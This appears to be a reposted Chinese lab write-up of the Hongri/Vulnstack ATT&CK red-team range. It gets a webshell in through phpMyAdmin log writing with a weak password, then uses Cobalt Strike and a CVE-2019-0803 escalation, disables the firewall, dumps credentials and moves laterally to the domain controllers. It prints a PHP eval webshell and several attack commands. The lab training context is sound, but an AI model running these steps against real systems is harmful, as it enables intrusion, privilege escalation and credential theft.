红日ATT&CK实战系列(一)

admin
admin
admin
102369
文章
87
评论
2024年1月6日09:51:01评论24 views字数 2175阅读7分15秒阅读模式

免责声明:涉及到的所有技术和工具仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透,否则产生的一切后果自行承担!

一、靶机信息   

靶机基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK攻击链路进行搭建                        靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/                        虚拟机初始密码:hongrisec@2019
原文链接:https://blog.csdn.net/qq_44605964/article/details/128820950

二、环境搭建  

由于该靶机环境搭建比较复杂,这里多写一些,记录一些搭建中遇到的问题

1、靶机文件  

下载好靶机环境后,解压完有三个文件夹

分别打开三个文件夹中的.vmx文件,运行后会自动打开虚拟机

打开后新增三个虚拟机 win server 2008、win7、win2003    

红日ATT&CK实战系列(一)

2、网络配置  

根据官网给出的网络配置图片来看

kali和win7同属于VM1网段(win7需新加网卡设置为VM1)

win7又与2008和2003属VM2网段

注:这里通过与主机ping的方式进行检测

我们先检查Web的IP:

Win7:

外网:

192.168.131.129

红日ATT&CK实战系列(一)

注:关闭Win7防火墙

内网:

192.16.52.143

红日ATT&CK实战系列(一)

Win2003:

内网:

192.168.52.141

红日ATT&CK实战系列(一)

Win server 2008

内网:

192.168.52.138

红日ATT&CK实战系列(一)

自此,我们的环境已经搭建完成,接下来,分析一波攻击路径

3、攻击路径   

攻击者:kali --192.168.131.129Web服务器:Win7 --192.168.131.129 --192.168.52.143域成员:Win2003 --192.168.52.141域控:Win server 2008 --192.168.52.138

三、信息收集  

在Win7中启动PHPstudy,nmap进行端口扫描    

红日ATT&CK实战系列(一)

访问80端口,是个探针

红日ATT&CK实战系列(一)

用dirsearch进行目录探测    

http://192.168.131.129/phpinfo.php

得到了站点绝对路径,php版本等信息

红日ATT&CK实战系列(一)

http://192.168.131.129/phpmyadmin/

弱口令root/root进入后台    

红日ATT&CK实战系列(一)

这里通过phpMyadmin日志写shell

参考文章:           https://blog.csdn.net/weixin_51692662/article/details/126998945

先查看有没有开启日志     

SHOW VARIABLES LIKE '%SECURE%';

红日ATT&CK实战系列(一)

开启日志

set GLOBAL general_log='on';

设置日志路径,绝对路径在探针里

set GLOBAL general_log_file="C://phpstudy/WWW/shell.php"

设置完成后写入shell

SELECT "<?php @eval($_POST[1]);?>

红日ATT&CK实战系列(一)

用蚁剑进行连接

红日ATT&CK实战系列(一)

查看IP

ipconfig            两张网卡分别是内外网

    红日ATT&CK实战系列(一)

查看当前登录的域和登录用户信息

net config workstation            有三台主机,域为GODDNSgod.org

红日ATT&CK实战系列(一)

查看域控

net group "domain controllers" /domain

红日ATT&CK实战系列(一)

查看域管

net group "domain admins" /domain

红日ATT&CK实战系列(一)

查看域成员

net view /domain:GOD

红日ATT&CK实战系列(一)

自此,信息收集基本完成

漏洞利用  

上线CS进行更深层次的利用    

首先,启动CS,生成exe文件,通过蚁剑上传并执行,CS成功上线

生成木马(这里只展示一种,还可以通过其他方式进行上线)

红日ATT&CK实战系列(一)

上传木马(命令行执行即可)

红日ATT&CK实战系列(一)

成功上线(调整睡眠时间为1s,方便后续操作)    

红日ATT&CK实战系列(一)

深层次的信息收集

查看主机名

shell hostname

红日ATT&CK实战系列(一)

查看用户列表

shell net users

红日ATT&CK实战系列(一)

查看域管

shell net localgroup administrators

红日ATT&CK实战系列(一)

接下来对拿下的Web服务器提权

查看系统版本

shell systeminfo

红日ATT&CK实战系列(一)

提权

这里就用经典的CVE-2019-0803

参考文章:           https://blog.csdn.net/Fly_hps/article/details/104236695

上传CVE-2019-0803.exe到服务器,并执行    

红日ATT&CK实战系列(一)

shell CVE-2019-0803.exe cmd "start artifact.exe"

成功上线SYSTEM权限的机子

红日ATT&CK实战系列(一)

查看任务列表    

shell taskllist

红日ATT&CK实战系列(一)

成功运行,没有防护软件(无免杀的CS马已经成功上传,有防护软件早被杀了)

查看防火墙状态

shell netsh firewall show state

红日ATT&CK实战系列(一)

关闭防火墙状态

shell netsh advfirewall set allprofile state off     

红日ATT&CK实战系列(一)

域渗透  

查看当前域内列表

net view

红日ATT&CK实战系列(一)

在CS执行成功后,它自己会将这些主机添加进去

红日ATT&CK实战系列(一)

查看域控列表

net dclist

红日ATT&CK实战系列(一)

先抓取服务器凭证    

红日ATT&CK实战系列(一)

抓取明文密码

红日ATT&CK实战系列(一)

创建SMB监听器    

红日ATT&CK实战系列(一)

红日ATT&CK实战系列(一)    

红日ATT&CK实战系列(一)

可以看到拿下域控OWA

红日ATT&CK实战系列(一)

然后拿OWA的session去打另一个    

红日ATT&CK实战系列(一)

红日ATT&CK实战系列(一)

可以看到拿下域控ROOT-TVI862UBEH    

红日ATT&CK实战系列(一)

自此拿下所有域控!!!

红日ATT&CK实战系列(一)    

原文始发于微信公众号(智检安全):红日ATT&CK实战系列(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月6日09:51:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日ATT&CK实战系列(一)http://cn-sec.com/archives/2367773.html

发表评论

匿名网友 填写信息